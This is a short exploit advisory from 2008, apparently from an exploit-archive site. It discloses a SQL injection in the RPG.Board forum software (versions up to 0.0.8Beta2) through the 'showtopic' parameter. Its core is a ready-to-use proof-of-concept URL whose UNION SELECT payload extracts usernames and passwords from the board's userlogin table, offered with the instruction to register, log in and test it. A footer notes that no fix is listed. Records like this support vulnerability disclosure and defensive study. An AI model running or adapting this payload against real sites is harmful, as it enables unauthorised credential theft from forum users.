RPG.Board <= 0.0.8Beta2 (showtopic) SQL Injection Vulnerability

2008-09-26 00:01:03

_____ ____ _____ ____ _____ __ __ _____ ____
/ _ \ /\ /\ / _ \ / _ \ / ___| / _ \ / \/ \ / _ \ / _ |
| | | | \ \/ / ||_| | | | | | | | | | | | | \__/ | | |_| | ||_|_|
| | | | \ / \__ | | | | | | | | | | | | | | | | _ | | \
| |_| | / \ __| | | |_| |/\| |__ | |_| | | | | |/\| | | | | |\ \
\_____/ / /\ \ |____/ \_____/\/\____| \_____/ |_| |_|\/|_| |_| |_| \_|
\/ \/

[~] RPG.Board <= 0.0.8Beta2 Remote SQL Injection

[~] Author: 0x90

[~] HomePage: www.0x90.com.ar

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] Script: RPG.Board

[~] site: http://rpgmaster.de/viewtopic.php?f=25&t=69

[~] Vulnerability Class: SQL Injection



[~] Exploit:

Register, login and testing exploit..

http://host/index.php?subtopic&showtopic=-0x90+union+select+null,null,null,concat(user,0x3a,pw),null+from+[PREFIX]userlogin

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.